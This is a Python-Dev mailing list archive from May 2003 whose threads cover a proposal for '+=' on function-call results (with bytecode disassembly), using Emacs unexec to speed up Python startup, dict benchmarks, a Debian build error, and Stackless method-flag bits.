From lkcl@samba-tng.org  Mon May 19 10:08:11 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 09:08:11 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030517152137.GA25579@unpythonic.net>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost> <20030517152137.GA25579@unpythonic.net>
Message-ID: <20030519090811.GB737@localhost>

hiya jeff,

on radio 4 today there was a discussion about art - what makes
people go "wow" instead of being shocked.  seeing the byte code
in front of my eyes isn't so much of a shock, more of a "wow"
because i have at some point in my past actually _looked_ at the
python sources stack machine, for investigating parallelising it
(!!!!!)


okay.

how do i run the examples you list?  dis.dis(f) gives an
"unrecognised variablename dis".

okay.  let's give this a shot.


Script started on Mon May 19 08:44:19 2003
lkcl@highfield:~$ python O
Python 2.2.2 (#1, Jan 18 2003, 10:18:59) 
[GCC 3.2.2 20030109 (Debian prerelease)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import dis
>>> def g(): return f(x)
... 
>>> dis.dis(g)
          0 LOAD_GLOBAL              0 (f)
          3 LOAD_GLOBAL              1 (x)
          6 CALL_FUNCTION            1
          9 RETURN_VALUE        
         10 LOAD_CONST               0 (None)
         13 RETURN_VALUE        
>>> def g(): f(x)
... 
>>> dis.dis(g)
          0 LOAD_GLOBAL              0 (f)
          3 LOAD_GLOBAL              1 (x)
          6 CALL_FUNCTION            1
          9 POP_TOP             
         10 LOAD_CONST               0 (None)
         13 RETURN_VALUE        
>>> 
lkcl@highfield:~$ exit

Script done on Mon May 19 08:44:56 2003


right.

the difference between these two is the POP_TOP.

so, the return result is placed on the stack, from the call to
f(x).

so... if there's instead an f(x) += 1 instead of f(x), then
the result is going to be pushed onto the top of the stack,
followed by the += 1, followed at the end by a POP_TOP.

if the result is used (e.g. assigned to a variable),

x = f(x) += 1

then you don't do the POP_TOP.


... am i missing something?


what am i missing?

that it's not known what type of variable is returned, therefore
you're not certain as to what type of STORE to use?


Script started on Mon May 19 08:51:22 2003
lkcl@highfield:~$ python -O
Python 2.2.2 (#1, Jan 18 2003, 10:18:59) 
[GCC 3.2.2 20030109 (Debian prerelease)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def f(): return 5
... 
>>>     def g(): 
...     x = f() + 1
...     return x
... 
>>> import dis
>>> dis.dis(g)
          0 LOAD_GLOBAL              0 (f)
          3 CALL_FUNCTION            0
          6 LOAD_CONST               1 (1)
          9 BINARY_ADD          
         10 STORE_FAST               0 (x)
         13 LOAD_FAST                0 (x)
         16 RETURN_VALUE        
         17 LOAD_CONST               0 (None)
         20 RETURN_VALUE        
>>> 
lkcl@highfield:~$ 
Script done on Mon May 19 08:52:40 2003


okay...  soo.... you get an assignment into a variable...
...

okay, i think i see what the problem is.

because the return result _may_ not be used, you don't know
what type of STORE to use?


or, because there are optimisations added, it's not always
possible to "pass down" the right kind of STORE_xxx to
the previous stack level?



i believe you may be thinking that this is more complex than
it is.  that's very patronising of me.  scratch that.

i believe this should not be complex :)


"+=" itself is a function call with two arguments and a return
result, where the return result is the first argument.

it just _happens_ that that function call has been drastically
optimised - with its RETURN_VALUE removed; STORE_xxx removed.


more thought needed.  i'll go look at some code.

l.

p.s. 10 and 13 in the 8:52:40am typescript above look like they
could be optimised / removed.

p.p.s. yes i _have_ written a stack-machine optimiser before.




On Sat, May 17, 2003 at 10:21:39AM -0500, Jeff Epler wrote:
> I think that looking at the generated bytecode is useful.
> 
> # Running with 'python -O'
> >>> def f(x): x += 1
> >>> dis.dis(f)
>           0 LOAD_FAST                0 (x)
>           3 LOAD_CONST               1 (1)
>           6 INPLACE_ADD         
>           7 STORE_FAST               0 (x)    ***
>          10 LOAD_CONST               0 (None)
>          13 RETURN_VALUE        
> >>> def g(x): x[0] += 1
> >>> dis.dis(g)
>           0 LOAD_GLOBAL              0 (x)
>           3 LOAD_CONST               1 (0)
>           6 DUP_TOPX                 2
>           9 BINARY_SUBSCR       
>          10 LOAD_CONST               2 (1)
>          13 INPLACE_ADD         
>          14 ROT_THREE           
>          15 STORE_SUBSCR                      ***
>          16 LOAD_CONST               0 (None)
>          19 RETURN_VALUE        
> >>> def h(x): x.a += 1
> >>> dis.dis(h)
>           0 LOAD_GLOBAL              0 (x)
>           3 DUP_TOP             
>           4 LOAD_ATTR                1 (a)
>           7 LOAD_CONST               1 (1)
>          10 INPLACE_ADD         
>          11 ROT_TWO             
>          12 STORE_ATTR               1 (a)    ***
>          15 LOAD_CONST               0 (None)
>          18 RETURN_VALUE        
> 
> In each case, there's a STORE step to the inplace statement.  In the case of the proposed
> 	def j(x): x() += 1
> what STORE instruction would you use?
> 
> >>> [opname for opname in dis.opname if opname.startswith("STORE")]
> ['STORE_SLICE+0', 'STORE_SLICE+1', 'STORE_SLICE+2', 'STORE_SLICE+3',
>  'STORE_SUBSCR', 'STORE_NAME', 'STORE_ATTR', 'STORE_GLOBAL', 'STORE_FAST',
>  'STORE_DEREF']
> 
> If you don't want one from the list, then you're looking at substantial
> changes to Python.. (and STORE_DEREF probably doesn't do anything that's
> relevant to this situation, though the name sure sounds promising,
> doesn't it)
> 
> Jeff

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From Paul.Moore@atosorigin.com  Mon May 19 10:36:27 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Mon, 19 May 2003 10:36:27 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
Message-ID: <16E1010E4581B049ABC51D4975CEDB880113DB01@UKDCX001.uk.int.atosorigin.com>

From: Jim Fulton [mailto:jim@zope.com]
> You can read the documentation for it here:

> http://www.python.org/dev/doc/devel/ext/defining-new-types.html

Just looking at this, I note the "Note" at the top. The way
this reads, it implies that details of how things used to work
has been removed. I don't know if this is true, but I'd prefer
if it wasn't.

People upgrading their extensions would find the older
information useful (actually, an "Upgrading from the older API"
section would be even nicer, but that involves more work...)
Having to refer to an older copy of the documentation (which they
may not even have installed) could tip the balance between "lets
keep up to date" and "if it works, don't fix it".

Heck, I still have some code I wrote for the 1.4 API which still
works. I've never got round to upgrading it, on the basis that
someone might be using it with 1.5 still. But when I do, I'd
dump pre-2.2 support, so *I* have no use for "older" documentation
except to find out what all that old code meant... :-)

If the old information is still there, maybe it's just the tone
of the note that should be changed.

Paul.


From jim@zope.com  Mon May 19 11:30:04 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 19 May 2003 06:30:04 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <16E1010E4581B049ABC51D4975CEDB880113DB01@UKDCX001.uk.int.atosorigin.com>
References: <16E1010E4581B049ABC51D4975CEDB880113DB01@UKDCX001.uk.int.atosorigin.com>
Message-ID: <3EC8B22C.2070109@zope.com>

Moore, Paul wrote:
> From: Jim Fulton [mailto:jim@zope.com]
> 
>>You can read the documentation for it here:
> 
> 
>>http://www.python.org/dev/doc/devel/ext/defining-new-types.html
> 
> 
> Just looking at this, I note the "Note" at the top. The way
> this reads, it implies that details of how things used to work
> has been removed. I don't know if this is true, but I'd prefer
> if it wasn't.

The section has been rewritten. The examples are quire different
than they used to be. There's no way to document the old and new
ways together without:

- Making this a lot more confusing, and

- violating the "one way to do it" in Python rule.


> People upgrading their extensions would find the older
> information useful (actually, an "Upgrading from the older API"
> section would be even nicer, but that involves more work...)
> Having to refer to an older copy of the documentation (which they
> may not even have installed) could tip the balance between "lets
> keep up to date" and "if it works, don't fix it".

In general, I'd say that if the old extensions aren't broke, don't
fix them.  If someone *is* going to go through the trouble to update
them, then I think they can manage to get the old docs.

Further, if you have written an old extension, you probably already
know the old way to define types, so you don't need the old docs.

> Heck, I still have some code I wrote for the 1.4 API which still
> works. I've never got round to upgrading it, on the basis that
> someone might be using it with 1.5 still. But when I do, I'd
> dump pre-2.2 support, so *I* have no use for "older" documentation
> except to find out what all that old code meant... :-)
> 
> If the old information is still there, maybe it's just the tone
> of the note that should be changed.

The old information is not still there.  I'm not gonna add it back,
because it would make the document far more confusing.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From dmorton@bitfurnace.com  Mon May 19 12:29:56 2003
From: dmorton@bitfurnace.com (damien morton)
Date: Mon, 19 May 2003 07:29:56 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPHEFAB.tim.one@comcast.net>
Message-ID: <000201c31df9$f9e39650$6401a8c0@damien>

Not so simple after all, or maybe too simple.

My 'simple' largedict test was simplistic and flawed, and a more
thorough test shows a slowdown on large dicts. I was inserting,
accessing, and deleting the keys without randomising the order, and once
randomised, cache effects kicked in. The slowdown isnt too huge though.

Further testing against small dicts shows a much larger slowdown.

The 5% improvement in pystone results still stands, but I think the main
reason for the improvement is that I had inlined some fail-fast tests
into ceval.c

Oh well, back to the drawing board.




From jepler@unpythonic.net  Mon May 19 13:06:36 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Mon, 19 May 2003 07:06:36 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <E904818D-89A9-11D7-B165-003065EEFAC8@wooz.org>
References: <20030519024618.GB10317@unpythonic.net> <E904818D-89A9-11D7-B165-003065EEFAC8@wooz.org>
Message-ID: <20030519120633.GA12073@unpythonic.net>

O Sun, May 18, 2003 at 11:28:08PM -0400, Barry Warsaw wrote:
> Since it looks like you implemented the meat of it as a module, I 
> wonder if it couldn't be cleaned up (with the interrupt reset either 
> pulled in the extension or exposed to Python) and added to Python 2.3?

First off, I sure doubt that this feature could be truly made
"non-experimental" before 2.3 is released.  There was one "strange bug" so
far (the signal thing), though that was quickly solved (with another
change to the core Python source code).

Secondly, forcing all allocations to come from the heap instead of mmap'd
space may hurt performance.

Thirdly, the files implementing unexec itself, which come from fsf emacs,
are covered by the GNU GPL, which I think makes them unsuitable for
compiling into Python. (There's something called "dynodump" in Emacs that
appears to apply to ELF binaries which bears this license:
 * This source code is a product of Sun Microsystems, Inc. and is provided
 * for unrestricted use provided that this legend is included on all tape
 * media and as a part of the software program in whole or part.  Users
 * may copy or modify this source code without charge, but are not authorized
 * to license or distribute it to anyone else except as part of a product or
 * program developed by the user.
I wish I understood what "except as part of a product or program developed
by the user" meant--does that mean that Alice can't download Python
then give it to Bob if it includes dynodump?  After all, Alice didn't
develop it, she simply downloaded it.  The other dumpers in xemacs
seem to be GPL, and I think that the "portable undump" mentioned by
another poster is a placeholder for a project that isn't written yet:
http://www.xemacs.org/Architecting-XEmacs/unexec.html)

Fourthly, we'd have to duplicate whatever machinery chooses the correct
unexec implementation for the platform you're running on---there are lots to
choose from:
	unexaix.c     unexconvex.c  unexenix.c     unexnext.c    unexw32.c
	unexalpha.c   unexec.c      unexhp9k800.c  unexsni.c
	unexapollo.c  unexelf.c     unexmips.c     unexsunos4.c
(Of course, it's well known that only elf and win32 matter in these modern
times)

I'd be excited to see "my work" in Python, though the fact of the matter
is that I just tried this out because I was bored on a Sunday afternoon.

Jeff


From lkcl@samba-tng.org  Mon May 19 13:53:17 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 12:53:17 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030517152137.GA25579@unpythonic.net>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost> <20030517152137.GA25579@unpythonic.net>
Message-ID: <20030519125317.GC737@localhost>

jeff,

beat bolli's code example:

	count[word] = count.get(word, 0) + 1

i think best illustrates what issue you are trying to raise.

okay, we know there are two issues so let's give an example
that removes one of those issues:

	count = {}

	count[word] = count.get(word, []) + ['hello']

the issue is that the difference between the above 'hello'
example and this:

	count.get(word, []) += ['hello']

is that you don't know what STORE to use after the use of get()
in the second example, but you do in the first example because
it's explicity set out.

so, does this help illustrate what might be done?

if it's possible to return a result and know what should be done
with it, then surely it should be possible to return a result from
a += "function" and know what should be done with it?

l.



On Sat, May 17, 2003 at 10:21:39AM -0500, Jeff Epler wrote:
> I think that looking at the generated bytecode is useful.
> 
> # Running with 'python -O'
> >>> def f(x): x += 1
> >>> dis.dis(f)
>           0 LOAD_FAST                0 (x)
>           3 LOAD_CONST               1 (1)
>           6 INPLACE_ADD         
>           7 STORE_FAST               0 (x)    ***
>          10 LOAD_CONST               0 (None)
>          13 RETURN_VALUE        
> >>> def g(x): x[0] += 1
> >>> dis.dis(g)
>           0 LOAD_GLOBAL              0 (x)
>           3 LOAD_CONST               1 (0)
>           6 DUP_TOPX                 2
>           9 BINARY_SUBSCR       
>          10 LOAD_CONST               2 (1)
>          13 INPLACE_ADD         
>          14 ROT_THREE           
>          15 STORE_SUBSCR                      ***
>          16 LOAD_CONST               0 (None)
>          19 RETURN_VALUE        
> >>> def h(x): x.a += 1
> >>> dis.dis(h)
>           0 LOAD_GLOBAL              0 (x)
>           3 DUP_TOP             
>           4 LOAD_ATTR                1 (a)
>           7 LOAD_CONST               1 (1)
>          10 INPLACE_ADD         
>          11 ROT_TWO             
>          12 STORE_ATTR               1 (a)    ***
>          15 LOAD_CONST               0 (None)
>          18 RETURN_VALUE        
> 
> In each case, there's a STORE step to the inplace statement.  In the case of the proposed
> 	def j(x): x() += 1
> what STORE instruction would you use?
> 
> >>> [opname for opname in dis.opname if opname.startswith("STORE")]
> ['STORE_SLICE+0', 'STORE_SLICE+1', 'STORE_SLICE+2', 'STORE_SLICE+3',
>  'STORE_SUBSCR', 'STORE_NAME', 'STORE_ATTR', 'STORE_GLOBAL', 'STORE_FAST',
>  'STORE_DEREF']
> 
> If you don't want one from the list, then you're looking at substantial
> changes to Python.. (and STORE_DEREF probably doesn't do anything that's
> relevant to this situation, though the name sure sounds promising,
> doesn't it)
> 
> Jeff

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From barry@python.org  Mon May 19 14:09:59 2003
From: barry@python.org (Barry Warsaw)
Date: Mon, 19 May 2003 09:09:59 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519120633.GA12073@unpythonic.net>
Message-ID: <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org>

On Monday, May 19, 2003, at 08:06 AM, Jeff Epler wrote:

> First off, I sure doubt that this feature could be truly made
> "non-experimental" before 2.3 is released.  There was one "strange 
> bug" so
> far (the signal thing), though that was quickly solved (with another
> change to the core Python source code).

Yeah, I was just tired and rambling after a long weekend. :)

Still, cool stuff!
-Barry



From skip@pobox.com  Mon May 19 15:24:54 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 19 May 2003 09:24:54 -0500
Subject: [Python-Dev] Simple dicts
In-Reply-To: <000001c31de1$322a0e90$6401a8c0@damien>
References: <LNBBLJKPBEHFEDALKOLCIEPHEFAB.tim.one@comcast.net>
 <000001c31de1$322a0e90$6401a8c0@damien>
Message-ID: <16072.59702.946136.830167@montanaro.dyndns.org>

    damien> Suggestions for more appropriate benchmarks are, as usual,
    damien> always welcome.

There's always Marc Andr=E9 Lemburg's pybench package.

Skip


From skip@pobox.com  Mon May 19 15:40:21 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 19 May 2003 09:40:21 -0500
Subject: [Python-Dev] Re: Using emacs' unexec to speed Python startup (was Re: [Python-Dev]
 Startup time)
In-Reply-To: <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org>
References: <20030519120633.GA12073@unpythonic.net>
 <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org>
Message-ID: <16072.60629.593925.7052@montanaro.dyndns.org>

    >> First off, I sure doubt that this feature could be truly made
    >> "non-experimental" before 2.3 is released.  There was one "strange
    >> bug" so far (the signal thing), though that was quickly solved (with
    >> another change to the core Python source code).

    Barry> Yeah, I was just tired and rambling after a long weekend. :)

On the other hand, I think it would be nice to check it into the sandbox if
it's not already there.  If licensing is an issue, just include a README
file which says, "Get thus-and-such from a recent Emacs (or XEmacs?)
distribution."

Skip



From lkcl@samba-tng.org  Mon May 19 15:57:55 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 14:57:55 +0000
Subject: [Python-Dev] [debian build error]
Message-ID: <20030519145755.GB25000@localhost>

there is at present a problem with python2.2 on debian, unstable dist.

there are dependency issues.

gcc 3.3 is now the latest for unstable.

gcc 3.3 contains a package libstdc++-5.

python2.2 is compiled with gcc 3.2.

installing the latest libstdc++-5, which is compiled with gcc 3.3,
causes python2.2 to complain:

/usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.

i thought you should know.

l.

p.s. it's not the only program affected by the broken libstdc++-5.

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From skip@pobox.com  Mon May 19 16:16:50 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 19 May 2003 10:16:50 -0500
Subject: [Python-Dev] [debian build error]
In-Reply-To: <20030519145755.GB25000@localhost>
References: <20030519145755.GB25000@localhost>
Message-ID: <16072.62818.314237.459419@montanaro.dyndns.org>

    Luke> gcc 3.3 is now the latest for unstable.

    Luke> gcc 3.3 contains a package libstdc++-5.

    Luke> python2.2 is compiled with gcc 3.2.

    Luke> installing the latest libstdc++-5, which is compiled with gcc 3.3,
    Luke> causes python2.2 to complain:

    Luke> /usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.

Is python2.2 compiled by you from source or is it a Debian-provided package?
If it was provided by Debian I think they'll have to be the ones to solve
the problem.

Skip


From Jack.Jansen@cwi.nl  Mon May 19 16:20:09 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Mon, 19 May 2003 17:20:09 +0200
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <6097E7A8-8A0D-11D7-9DD7-0030655234CE@cwi.nl>

I seem to remember that there's one or two bugfixes assigned to me that 
I thought
fairly important for 2.2.3 at the time. Unfortunately sf.net is down at 
the moment, so I can't check this, and I don't remember whether they 
were OSX-related (so they
have to go into the main release) or OS9 only (so they needn't hold up 
the main
release).

I'll try to get around to these tomorrow.
--
Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
If I can't dance I don't want to be part of your revolution -- Emma 
Goldman



From jepler@unpythonic.net  Mon May 19 16:24:01 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Mon, 19 May 2003 10:24:01 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <16072.60629.593925.7052@montanaro.dyndns.org>
References: <20030519120633.GA12073@unpythonic.net> <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org> <16072.60629.593925.7052@montanaro.dyndns.org>
Message-ID: <20030519152359.GA13673@unpythonic.net>

On Mon, May 19, 2003 at 09:40:21AM -0500, Skip Montanaro wrote:
> On the other hand, I think it would be nice to check it into the sandbox if
> it's not already there.  If licensing is an issue, just include a README
> file which says, "Get thus-and-such from a recent Emacs (or XEmacs?)
> distribution."

Sure, I think that could be a good idea.

How should the changes to core python be included?  Making 'import site'
happen when loading a dumped binary required another change.  I could
easily produce a diff for them.

Jeff


From skip@pobox.com  Mon May 19 16:39:33 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 19 May 2003 10:39:33 -0500
Subject: [Python-Dev] Re: Using emacs' unexec to speed Python startup (was Re: [Python-Dev]
 Startup time)
In-Reply-To: <20030519152359.GA13673@unpythonic.net>
References: <20030519120633.GA12073@unpythonic.net>
 <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org>
 <16072.60629.593925.7052@montanaro.dyndns.org>
 <20030519152359.GA13673@unpythonic.net>
Message-ID: <16072.64181.575078.727768@montanaro.dyndns.org>

    Jeff> How should the changes to core python be included?  Making 'import
    Jeff> site' happen when loading a dumped binary required another change.
    Jeff> I could easily produce a diff for them.

For now a context diff will probably work.  Slightly longer term, if the
changes look promising but are somehow incompatible with other stuff (like
your mallopt call) I think they should be conditionally compiled and an
--enable-unexec flag added to configure.  (I assume none of this stuff will
work on Windows.)

Skip



From jepler@unpythonic.net  Mon May 19 16:48:48 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Mon, 19 May 2003 10:48:48 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <16072.64181.575078.727768@montanaro.dyndns.org>
References: <20030519120633.GA12073@unpythonic.net> <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org> <16072.60629.593925.7052@montanaro.dyndns.org> <20030519152359.GA13673@unpythonic.net> <16072.64181.575078.727768@montanaro.dyndns.org>
Message-ID: <20030519154848.GD13673@unpythonic.net>

On Mon, May 19, 2003 at 10:39:33AM -0500, Skip Montanaro wrote:
> I assume none of this stuff will work on Windows.

there *is* a "unexnt.c" in xemacs, and "unexw32.c" in emacs.  I don't have
the ability to try them, but in theory they would work in the same way.

jeff


From pedronis@bluewin.ch  Mon May 19 17:07:08 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 19 May 2003 18:07:08 +0200
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030519125317.GC737@localhost>
References: <20030517152137.GA25579@unpythonic.net>
 <20030402090726.GN1048@localhost>
 <yu99n0j9gdas.fsf@europa.research.att.com>
 <20030515214417.GF3900@localhost>
 <yu99vfwbf62s.fsf@europa.research.att.com>
 <20030516142451.GI6196@localhost>
 <20030517152137.GA25579@unpythonic.net>
Message-ID: <5.2.1.1.0.20030519180035.0242bcd0@localhost>

At 12:53 19.05.2003 +0000, Luke Kenneth Casson Leighton wrote:
>jeff,
>
>beat bolli's code example:
>
>         count[word] = count.get(word, 0) + 1
>
>i think best illustrates what issue you are trying to raise.
>
>okay, we know there are two issues so let's give an example
>that removes one of those issues:
>
>         count = {}
>
>         count[word] = count.get(word, []) + ['hello']
>
>the issue is that the difference between the above 'hello'
>example and this:
>
>         count.get(word, []) += ['hello']
>
>is that you don't know what STORE to use after the use of get()
>in the second example, but you do in the first example because
>it's explicity set out.
>
>so, does this help illustrate what might be done?
>
>if it's possible to return a result and know what should be done
>with it, then surely it should be possible to return a result from
>a += "function" and know what should be done with it?
>
>l.


 >>> def refiadd(r,v): # r+=v, r is a reference, not a an lvalue
...   if hasattr(r.__class__,'__iadd__'):
...     r.__class__.__iadd__(r,v)
...   else:
...     raise ValueError,"non-sense"
...
 >>> greetings={}
 >>> refiadd(greetings.setdefault('susy',[]),['hello']) # 
greetings.setdefault('s
usy',[]) += ['hello']
 >>> refiadd(greetings.setdefault('susy',[]),['!']) # 
greetings.setdefault('susy'
,[]) += ['!']
 >>> greetings
{'susy': ['hello', '!']}
 >>> refiadd(greetings.setdefault('betty',1),1) # 
greetings.setdefault('susy',1)
+= 1
Traceback (most recent call last):
   File "<stdin>", line 1, in ?
   File "<stdin>", line 5, in refiadd
ValueError: non-sense

regards. 



From lkcl@samba-tng.org  Mon May 19 17:31:20 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 16:31:20 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <5.2.1.1.0.20030519180035.0242bcd0@localhost>
References: <20030517152137.GA25579@unpythonic.net> <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost> <20030517152137.GA25579@unpythonic.net> <5.2.1.1.0.20030519180035.0242bcd0@localhost>
Message-ID: <20030519163120.GB26355@localhost>

On Mon, May 19, 2003 at 06:07:08PM +0200, Samuele Pedroni wrote:

> >>> def refiadd(r,v): # r+=v, r is a reference, not a an lvalue
> ...   if hasattr(r.__class__,'__iadd__'):
> ...     r.__class__.__iadd__(r,v)
> ...   else:
> ...     raise ValueError,"non-sense"
> ...

you're a star - thank you!



From lkcl@samba-tng.org  Mon May 19 17:32:48 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 16:32:48 +0000
Subject: [Python-Dev] [debian build error]
In-Reply-To: <16072.62818.314237.459419@montanaro.dyndns.org>
References: <20030519145755.GB25000@localhost> <16072.62818.314237.459419@montanaro.dyndns.org>
Message-ID: <20030519163247.GD26355@localhost>

On Mon, May 19, 2003 at 10:16:50AM -0500, Skip Montanaro wrote:
> 
>     Luke> gcc 3.3 is now the latest for unstable.
> 
>     Luke> gcc 3.3 contains a package libstdc++-5.
> 
>     Luke> python2.2 is compiled with gcc 3.2.
> 
>     Luke> installing the latest libstdc++-5, which is compiled with gcc 3.3,
>     Luke> causes python2.2 to complain:
> 
>     Luke> /usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.
> 
> Is python2.2 compiled by you from source or is it a Debian-provided package?
 
 debian-provided.  i've actually had to remove gcc altogether in order
 to solve the problem (!!!)

 l.



From tismer@tismer.com  Mon May 19 19:12:48 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 19 May 2003 20:12:48 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EC91EA0.5090105@tismer.com>

Guido van Rossum wrote:

[me, about how to add _nr cfunction versions in a compatible way]

> I don't think we can just add an extra field to PyMethodDef, because
> it would break binary incompatibility.  Currently, in most cases, a
> 3r party extension module compiled for an earlier Python version can
> still be used with a later version.  Because PyMethodDef is used as an
> array, adding a field to it would break this.

Bad news. I hoped you would break binary compatibility between
major versions (like from 2.2 to 2.3), but well, now I also
understand why there are so many flags in typeobjects :-)

> I have less of a problem with extending PyTypeObject, it grows all the
> time and the tp_flags bits tell you how large the one you've got is.
> (I still have some problems with this, because things that are of no
> use to the regular Python core developers tend to either confuse them,
> or be broken on a regular basis.)

For the typeobjects, I'm simply asking for reservation
of a bit number. What I used is

#ifdef STACKLESS
#define Py_TPFLAGS_HAVE_CALL_NR (1L<<15)
#else
#define Py_TPFLAGS_HAVE_CALL_NR 0
#endif

but I think nobody needs to know about this, and maybe
it is better (requiring no change of Python) if I used
a bit from the higer end (31) or such?

> Maybe you could get away with defining an alternative structure for
> PyMethodDef and having a flag in tp_flags say which it is; there are
> plenty of unused bits and I don't mind reserving one for you.  Then
> you'd have to change all the code that *uses* tp_methods, but there
> isn't much of that; in fact, the only place I see is in typeobject.c.

The problem is that I need to give extra semantics to
existing objects, which are PyCFunction objects.
I think putting an extra bit into the type object
doesn't help, unless I use a new type. But then I don't
need the flag.
An old extension module which is loaded into my Python
will always use my PyCFunction, since this is always
borrowed.

> If this doesn't work for you, maybe you could somehow fold the two
> implementation functions into one, and put something special in the
> argument list to signal that the non-recursive version is wanted?
> (Thinking aloud here -- I don't know exactly what the usage pattern of
> the nr versions will be.)

This is hard to do. I'm adding _nr versions to existing
functions, and I don't want to break their parameter lists.


Ok, what I did is rather efficient, quite a bit ugly of
course, but binary compatible as much as possible.
It required to steal some bits of ml_flags as a small
integer, which are interpreted as "distance to my sibling".
I'm extending the MethodDef arrays in a special way
by just adding some extra records without name fields
at the end of the array, which hold the _nr pointers.

An initialization functions initializes the small integer
in ml_flags with the distance to this "sibling", and
the nice thing about this is that it will never fail
if not initialized:
A distance of zero gives just the same record.

So what I'm asking for in this case is a small number
of bits of the ml_flags word which will not be used,
otherwise.

Do you think the number of bits in ml_flags might ever
grow beyond 16, or should I just assume that I can
safely abuse them?

thanks a lot -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/



From martin@v.loewis.de  Mon May 19 21:10:45 2003
